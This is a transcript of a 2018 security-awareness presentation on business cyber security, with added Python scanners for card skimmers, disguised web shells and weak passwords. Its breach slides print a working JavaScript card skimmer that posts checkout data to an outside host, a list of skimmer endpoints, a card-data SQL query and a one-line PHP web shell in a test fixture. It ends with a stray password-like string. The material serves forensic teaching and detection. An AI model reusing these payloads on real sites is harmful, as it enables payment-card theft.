
Page 1: 3. SRM HIAF Presentation V0.1[1] (Read-Only)

4/30/18

Cyber Security – 25th April 2018

Alan Batey PCIP / PGCert Digital Forensics / B.A.
Forensic and IR Manager
Security Risk Management Ltd

Agenda

To provide an overview of cyber security and the effects on today's businesses:

- What is cyber security?

- Creating a culture around cyber security

- Data security measures

- Tips and best practice

What is cyber security?

Page 2

Cyber Security is the collection of:

- Actions
- Policies
- Training
- Guidelines
- Best practices
- Security concepts
- Technologies
- Safeguards
- Tools
- Risk management

Cyber Security Culture in business

Cyber security awareness is inseparable from information security awareness.

If you raise employees' awareness of their information security responsibilities, you will eventually change the culture within the organisation.

It is also about making information security considerations an integral part of employees' job habits and conduct, embedding them in their day-to-day actions.

Page 3

Data Security in today’s environment

Hunting was necessary to survive. Making sure the good hunting areas were kept secret from other clans was essential. This ensured a plentiful supply of good food to maintain life.

Security is not a new concept..

Not long after the invention of coins, we needed security to stop, or at least easily identify, counterfeit ones.

Julius Caesar used the "shift by 3" rule (each letter replaced by the one three places further along the alphabet, the cipher that now bears his name) when sending messages to his army to keep them secret from his enemies.

In WW2 the Enigma device was used by the Germans to keep their troop movements and battle plans secret from the British.

Page 4

Pause for thought..

In cyberspace, we have created an environment in which we, as humans, have yet to evolve the native senses to survive.

Common security fallacies..

- "We have anti-virus software, so we're secure"
- "We have a firewall, so we're secure"
- "The most serious threats come from the outside"
- "I don't worry about security as I back up my data daily"
- "Responsibility for security falls under the IT team"

Keep calm and remember..

- The core rules haven't changed
- The environment continues to change
- We all have the tools to survive
- We just need to engage them
- We need to adjust processes and behaviours

Page 5

3 basic principles..

- Confidentiality (C): protecting information from unauthorised disclosure
- Integrity (I): protecting information from unauthorised modification
- Availability (A): ensuring information is available to authorised users when it's needed

Yet a great deal of mystery and intrigue still surrounds information security!

A security analogy..

Imagine driving with no traffic laws and the chaos and danger for drivers and pedestrians!

Information security management and policies provide the same type of protection for systems and users that traffic laws provide for drivers and pedestrians: safer for the individual, beneficial for everyone!

A car, for example..

Security is like the brakes on your car: their function is to slow you down, but their purpose is to allow you to go fast!

Page 6

The way it used to be..

One way in! One entrance to protect!

The way it is now..

Many ways in! Many entrances to protect!

So, what is a cyber security policy?

The Information Security Policy sets out users' day-to-day security responsibilities

It relates to all employees, contractors and consultants

It dictates how sensitive information must be looked after

It is your responsibility to protect business information and know how it affects you

Page 7

How does it affect me?

The problem..

- "It won't affect me"
- "Too expensive"
- Not recognising the cyber security threat or the vulnerability that exposes you to it
- Not understanding the potential impact

Some stats..

- 80% of crime against businesses is now cyber crime
- Attacks are very methodical and precise
- SMEs are the most targeted
- Commonly preventable: missing anti-virus updates and a lack of internal policy, process and procedures
- On average, for every £40,000 lost per breach, only £1,000 is recovered

Page 8

Information security threats

- Malware
- Hacking and Denial of Service attacks
- Spyware
- Phishing
- Identity theft
- Misuse

Malware – basic steps of a breach

1. Discover an unpatched CMS application.
2. Upload a web shell to the server, providing a backdoor and ongoing access.
3. Escalate privileges to fully compromise the web server and the payment application.
4. Modify the payment application code to collect payment card data as it is processed and dump it into a file.
5. Use the web shell to retrieve the card dumps.

8 out of 10 breaches we investigate are based on the Magento CMS.

Magento is among the most popular e-commerce platforms.

Page 9

Payment model code from a compromised Magento store. getCentinelValidationData() is the platform's own method, which gathers the card number, expiry and amount into a Varien_Object for 3-D Secure validation; the _storeInfos() function beneath it was added by the intruder, and its default path, a .jpg under media/catalog/product, is where the captured card data is written. The slide cuts off before the function body.

```php
/**
 * Return data for Centinel validation
 *
 * @return Varien_Object
 */
public function getCentinelValidationData()
{
    $info = $this->getInfoInstance();
    $params = new Varien_Object();
    $params
        ->setPaymentMethodCode($this->getCode())
        ->setCardType($info->getCcType())
        ->setCardNumber($info->getCcNumber())
        ->setCardExpMonth($info->getCcExpMonth())
        ->setCardExpYear($info->getCcExpYear())
        ->setAmount($this->_getAmount())
        ->setCurrencyCode($this->_getCurrencyCode())
        ->setOrderNumber($this->_getOrderId());
    return $params;
}

/**
 * Store when success
 *
 * @return bool
 */
private function _storeInfos($file = '/var/www/vhosts/ecommercesite.com/httpdocs/media/catalog/product/1/7/1678.pu_1.jpg')
{
    // body not reproduced on the slide
```

Emailed to South Korea.

Files recovered (name, size):

- 17678.pu, 178KB
- 17678.pu_1, 236KB

Image hacking: the dump is given an image file name and placed under the product-image directory, so it sits among thousands of legitimate uploads and is served by the web server like any other picture.

Cut and paste: in this case the intruder queried the order database directly and copied the result out.

```sql
SELECT c.cardnumber, c.expiration, c.seqcode, c.cardHolder,
       s.address, s.city, s.stateCode, s.zip, s.digitalemailtext
FROM dbo.creditCards c, dbo.orders s
WHERE c.[idOrder] = s.[idOrder];
```

If seqcode is the card security code, as its place beside the card number and expiry suggests, its storage alone is a PCI DSS failure: sensitive authentication data must not be retained after authorisation, so this database was exposing cardholders before the intruder arrived.

Card holder data from this location was then saved in four files on the desktop named 2014.txt, 2015.txt, csv1 and Desktop.zip.

Copied out to two external websites, pastie.org and defuse.ca.

Emailed to [email protected]
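A triage scan for the breach pattern on the last two slides, written for this page as an added example and not code from the presentation: it walks a web root looking for PHP code inside files that should be static images (a web shell, or the dump hidden under a product-image name) and for files that hold several Luhn-valid 13 to 16 digit runs, which is what a staged card dump looks like. The web root it builds is a constructed stand-in for a Magento install, and the card numbers in it are the public test numbers, not real cards.

```python
"""Triage scan for the breach pattern on the last two slides: PHP code
hidden in files that should be static images, and files holding runs of
Luhn-valid card numbers. Added example, not code from the presentation;
the web root below is a constructed stand-in for a Magento install."""
import os
import re
import tempfile

IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif"}
PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)
DIGIT_RUN = re.compile(rb"(?<!\d)\d{13,16}(?!\d)")
DUMP_THRESHOLD = 5  # one Luhn-valid run is noise; a handful in one file is a dump


def luhn_ok(digits: str) -> bool:
    """Luhn check-digit test, the one payment card numbers must pass."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:  # every second digit from the right is doubled
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def count_pans(data: bytes) -> int:
    """Number of 13-16 digit runs in the data that pass the Luhn test."""
    return sum(1 for m in DIGIT_RUN.finditer(data) if luhn_ok(m.group().decode()))


def scan_webroot(root: str) -> list:
    """Return sorted (relative path, reason) pairs for every suspicious file."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if os.path.splitext(name)[1].lower() in IMAGE_EXT and PHP_TAG.search(data):
                findings.append((rel, "php code inside image file"))
            if count_pans(data) >= DUMP_THRESHOLD:
                findings.append((rel, "possible card number dump"))
    return sorted(findings)


def build_sample_webroot() -> str:
    """Constructed web root: a clean image, a web shell named as an image, a
    card dump named like the slide's 1678.pu_1.jpg, and a normal PHP file."""
    root = tempfile.mkdtemp(prefix="webroot_")
    media = os.path.join(root, "media", "catalog", "product", "1", "7")
    code = os.path.join(root, "app", "code", "core", "Mage", "Payment", "Model", "Method")
    os.makedirs(media)
    os.makedirs(code)
    with open(os.path.join(media, "1678.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0" + bytes(range(256)))  # JPEG header plus filler
    with open(os.path.join(media, "shell.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0<?php eval($_POST['c']); ?>")  # shell behind a JPEG header
    with open(os.path.join(media, "1678.pu_1.jpg"), "w") as fh:
        for pan in ("4111111111111111", "5555555555554444", "378282246310005",
                    "4012888888881881", "6011111111111117", "5105105105105100"):
            fh.write(f"{pan}|12/19|123|J Smith\n")  # PAN|expiry|cvv|name, test numbers only
    with open(os.path.join(code, "Cc.php"), "w") as fh:
        fh.write("<?php\nclass Mage_Payment_Model_Method_Cc {}\n")  # PHP where PHP belongs
    return root


if __name__ == "__main__":
    for rel, reason in scan_webroot(build_sample_webroot()):
        print(f"{reason:28s} {rel}")
```

The scan flags the dump and the disguised shell but not the genuine image or the real PHP file. Run against a live store it should be pointed at media/ and var/ first, where an intruder has write access even after the application code is locked down, and any file it flags should be copied off with its timestamps intact before anything is cleaned up.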

Page 10

Javascript – shoplift vulnerability

A skimmer recovered from a database row on a compromised store. snd holds the data captured from the checkout form; the script sets asd to "1" when that data contains a 13 to 16 digit run (a card number), POSTs it to the attacker's collection point at antaras.xyz together with the victim site's name, clears the browser console so the request leaves no visible trace, and re-arms itself every 150 ms. The fragment starts mid-function (the opening of send() is not on the slide) and ends with the remaining columns of the row it was stored in: `'2014-11-11 05:04:41','2015-07-27 16:48:03'`.

```javascript
var cc = new RegExp("[0-9]{13,16}");
var asd = "0";
if (cc.test(snd)) {
    asd = "1";
}
var http = new XMLHttpRequest();
http.open("POST", "https://antaras.xyz/jquery.php", true);
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.send("data=" + snd + "&asd=" + asd + "&id_id=ecommercesite.co.uk");
console.clear();
}
snd = null;
setTimeout('send()', 150);
}
// ]]></script>
```

Endpoint counts from the same slide (count, URL):

- 1860 https://ownsafety.org/opp.php
- 390 http://ownsafety.org/opp.php
- 309 https://useagleslogistics.com/gates/jquery.php
- 100 https://redwiggler.org/wp-content/themes/jquerys.php
- 70 https://clickvisits.biz/xrc.php
- 28 https://gamula.eu/jquery.php
- 23 https://gamula.ru/order.php
- 22 https://news-daily.me/gt/
- 20 https://antaras.xyz/jquery.php
- 17 https://clicksale.xyz/xrc.php
- 10 https://ausfunken.com/service/css.php
- 9 http://www.dobell.com/var/extendware/system/licenses/encoder/mage_ajax.php
- 5 https://redwiggler.org/wp-content/themes/jquery.php
- 1 /js/index.php
- 1 /js/am/extensions/sitemap_api.php
- 1 https://infopromo.biz/lib/jquery.php
- 1 https://google-adwords-website.biz/gates/jquery.php
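A check for this kind of skimmer in stored page content, added here as an example rather than taken from the presentation: it looks at each configuration row for an XMLHttpRequest POST to a host that is not the shop's own, a regex literal that tests for a card-number-length digit run, and a console.clear() call, and treats the combination as a skimmer. The rows are constructed (the skimmer body is the slide's fragment, the other two rows are stand-ins), and the first-party host list is an assumption.

```python
"""Scan stored page content for a card skimmer of the kind reproduced above:
script text that tests captured form data against a card-number pattern and
POSTs it to a host that is not the shop's own. Added example, not code from
the presentation; the rows and the first-party host list are assumptions."""
import re
from urllib.parse import urlparse

SHOP_HOSTS = {"ecommercesite.co.uk", "www.ecommercesite.co.uk"}  # assumed first-party hosts

# XMLHttpRequest.open("POST", url): the skimmer's exfiltration call
XHR_POST = re.compile(r"""\.open\(\s*['"]POST['"]\s*,\s*['"]([^'"]+)['"]""", re.I)
# a regex literal for a 13-16 digit run: the test that picks card numbers out of form data
CARD_TEST = re.compile(r"(?:\[0-9\]|\\d)\{1\d,\s*\d+\}")
# an off-site <script src> is not proof by itself, but is where a loader usually sits
SCRIPT_SRC = re.compile(r"""<script[^>]+src=['"]([^'"]+)['"]""", re.I)


def _offsite(urls, shop_hosts):
    """Keep only absolute URLs whose host is not one of ours."""
    out = []
    for url in urls:
        host = urlparse(url).hostname
        if host and host not in shop_hosts:
            out.append(url)
    return out


def skimmer_indicators(content: str, shop_hosts=SHOP_HOSTS) -> dict:
    return {
        "offsite_post": _offsite(XHR_POST.findall(content), shop_hosts),
        "offsite_script_src": _offsite(SCRIPT_SRC.findall(content), shop_hosts),
        "card_pattern": bool(CARD_TEST.search(content)),
        "console_clear": "console.clear()" in content,
    }


def is_skimmer(ind: dict) -> bool:
    """Off-site POST plus a card test or console clearing is a skimmer;
    an off-site script src alone only merits a manual look."""
    return bool(ind["offsite_post"]) and (ind["card_pattern"] or ind["console_clear"])


def scan_rows(rows) -> list:
    """rows: (config path, value) pairs such as Magento's core_config_data holds."""
    return [(path, skimmer_indicators(value)) for path, value in rows]


SKIMMER_FRAGMENT = """<script type="text/javascript">
// <![CDATA[
var cc = new RegExp("[0-9]{13,16}");
var asd = "0";
if (cc.test(snd)) { asd = "1"; }
var http = new XMLHttpRequest();
http.open("POST", "https://antaras.xyz/jquery.php", true);
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.send("data=" + snd + "&asd=" + asd + "&id_id=ecommercesite.co.uk");
console.clear();
snd = null;
setTimeout('send()', 150);
// ]]></script>"""


def sample_rows():
    """Constructed rows: a first-party script include, a first-party AJAX
    call, and the skimmer injected into the footer config value."""
    return [
        ("design/head/includes",
         '<script src="https://www.ecommercesite.co.uk/js/varien/form.js"></script>'),
        ("checkout/custom/ajax",
         '<script>var x = new XMLHttpRequest(); x.open("POST", "/checkout/onepage/saveOrder", true);</script>'),
        ("design/footer/absolute_footer", SKIMMER_FRAGMENT),
    ]


if __name__ == "__main__":
    for path, ind in scan_rows(sample_rows()):
        print(f"{path:32s} skimmer={is_skimmer(ind)} post={ind['offsite_post']}")
```

Only the footer row trips the check; the relative-URL POST to the shop's own checkout is ignored because it has no host. The same indicators apply to the JavaScript files under js/ and skin/, which the endpoint list above shows were also used as gates, so the scan should cover files on disk as well as database rows.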

Email

Email should be used for business purposes only with incidental limited personal use

Be careful of incoming emails from unknown persons, as they may contain viruses

Do not send anything inappropriate

Misuse of e-mail may also amount to racial/sexual harassment/bullying or victimisation. Even jokes and general office banter, which some people find amusing, may cause offence to others. Therefore, care should be taken when sending items such as chain letters, junk mail and jokes

The use of Internet-based e-mail is expressly forbidden.

Page 11

Passwords

You are responsible for keeping your company user account secure. Passwords must NEVER be disclosed to anyone.

- You must not log in as another user when logging into the computer system
- Do not write your password down
- Do not share your password with others
- Change your password if you think someone else knows it

What is a strong password? Think of a sentence that you can remember:

"British summers are the best"

Use the first few letters of each word to create a made-up word: "brsumatb"

Add some complexity: "BrsUmatb" – add a mix of CAPS and lower case. Substitute characters with numbers and symbols: "Br$Um4tb" – change 's' to '$' and change 'a' to '4'.

Bear in mind that these substitutions ('s' to '$', 'a' to '4', 'o' to '0') are built into password-cracking rule sets, so they add less strength than they appear to; the length of the sentence you start from matters more than the symbols, and a longer sentence gives a stronger password.

Over to you – try to work out a 'strong password' for yourself. Practise this technique; you can also use it at home and for anything else for which you need to remember an important password. Never use dictionary words, acronyms, birthdays, sequential numbers, family names, football teams, dates, etc. – they are easily guessed!
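A checker that applies the slide's rules to a candidate password, added here as an example and not code from the presentation: minimum length, mixed character classes, and no dictionary words, names, dates, years or sequential runs, tested after the common substitutions have been undone, since that is what a cracker's rule set does. The word list is a constructed stand-in for a real dictionary plus names, teams and leaked passwords.

```python
"""Applies the slide's password rules to a candidate, undoing the usual
's' to '$', 'a' to '4', 'o' to '0' substitutions first, because cracking
rule sets undo them too. Added example, not code from the presentation;
the word list is a constructed stand-in for a real dictionary."""
import re

# reverse the substitutions the slide recommends (and that crackers try first)
UNLEET = str.maketrans({"$": "s", "5": "s", "4": "a", "@": "a", "3": "e",
                        "1": "i", "!": "i", "0": "o", "7": "t"})
# constructed: a real check uses a full dictionary plus names, teams and leaked passwords
WORDS = {"password", "summer", "british", "arsenal", "liverpool", "london",
         "smith", "jones", "admin", "welcome", "monday", "qwerty", "letmein",
         "football", "united", "chelsea", "dragon", "monkey"}
SEQUENCES = ("0123456789", "abcdefghijklmnopqrstuvwxyz", "qwertyuiop", "asdfghjkl")
DATE_OR_YEAR = re.compile(r"(?:19|20)\d{2}|\d{1,2}[/.\-]\d{1,2}")
CLASSES = (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]")


def normalise(password: str) -> str:
    """Lower-case the password and undo the common character substitutions."""
    return password.lower().translate(UNLEET)


def check_password(password: str) -> list:
    """Return the list of rule violations; an empty list means it passes."""
    problems = []
    if len(password) < 8:
        problems.append("shorter than 8 characters")
    if sum(bool(re.search(c, password)) for c in CLASSES) < 3:
        problems.append("fewer than three character classes")
    base = normalise(password)
    for word in sorted(WORDS):
        if len(word) >= 4 and word in base:
            problems.append(f"contains dictionary word or name '{word}' after undoing substitutions")
    if DATE_OR_YEAR.search(password):
        problems.append("contains a date or year")
    raw = password.lower()
    for i in range(len(raw) - 3):  # any four characters in a row from a known sequence
        chunk = raw[i:i + 4]
        if any(chunk in s or chunk in s[::-1] for s in SEQUENCES):
            problems.append(f"contains a sequential run '{chunk}'")
            break
    return problems


if __name__ == "__main__":
    for candidate in ("Br$Um4tb", "Summer2018", "P@ssw0rd1!", "abcd1234"):
        print(candidate, "->", check_password(candidate) or "passes")
```

The slide's "Br$Um4tb" passes, while "Summer2018" is caught twice (the word and the year) and "P@ssw0rd1!" is caught once the substitutions are reversed. Passing these rules only means a password will not fall to the first, cheapest guesses; an eight-character password is still within reach of offline cracking, which is why the length of the starting sentence matters more than the symbols.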

Stealing passwords..

- social engineering, e.g. phishing, coercion
- manual password guessing, perhaps using personal information 'cribs' such as name, date of birth, or pet names
- intercepting a password as it is transmitted over a network
- 'shoulder surfing', observing someone typing in their password at their desk
- installing a keylogger
- searching an enterprise's IT infrastructure for electronically stored password information
- brute-force attacks; the automated guessing of large numbers of passwords until the correct one is found
- finding passwords which have been stored insecurely, such as handwritten or hidden close to a device
- compromising databases containing large numbers of user passwords, then checking for re-use of these

Page 12

What not to do..

Clear screen policy

Whenever you leave your desk, ALWAYS lock your screen by pressing Ctrl+Alt+Delete, selecting "Lock Workstation" and pressing Enter. You can also use Windows Key + L to lock your computer.

Upon your return you will be required to enter your password to unlock your machine. Only you will know this password.

If leaving your desk for any length of time, it may be more appropriate to consider logging out.

Social Engineering

"Amateurs hack systems, professionals hack people."

Page 13

Types of Social Engineering

Pretexting

The act of creating and using an invented scenario to persuade a targeted victim to release information or perform an action.

Phishing – Vishing – SMiShing

A technique of fraudulently obtaining private information, by e-mail, by phone call or by text message respectively.

A Favour For A Favour

Manipulating somebody to feel grateful and feel they owe the social engineer a favour.

Page 14

Types of Social Engineering

Baiting

Just like a real-world Trojan Horse: it uses physical media (a dropped USB stick, for instance) and relies on the curiosity or greed of the victim.

Key takeaways

- Be vigilant at all times
- Don't disclose your password
- Make your passwords complex
- Always lock your PC
- Encrypt sensitive information
- Keep a clear desk
- Dispose of company information correctly
- Delete suspicious emails
- Do not download or install anything on your work PC
- Be mindful of physical access/shoulder surfers


Page 15

What if we still have a breach?

Incident Management

Ensure you have detailed definitions. React according to a plan regardless of whether the breach is the result of:

- an external intruder attack, or
- unintentional damage, or
- a disgruntled employee

Each of the possible types of events, such as those listed above, should be detailed in advance by adequate contingency plans.

Incident Management

If there is limited attention given to how to handle an incident, or a hasty decision-making process, the following may result:

Difficulty in:

- tracking down the incident source
- collecting evidence
- preparing for the recovery of the system, and
- protecting the valuable data contained on the system

Page 16

We all have a choice..

The cyber environment is now a core part of our reality. It may be invisible and intangible – but it is active and contested.

We have two choices – to participate as an active player – or to be exploited as a resource.

Summary

We can’t prevent every attack, but we can reduce the likelihood – and make sure that we can survive when it happens.

There are two types of company or organisation: those who have been breached, and those who are about to be breached.

Information security is a serious business.

NE14ToRcOFF33?T1m3f0R1unch!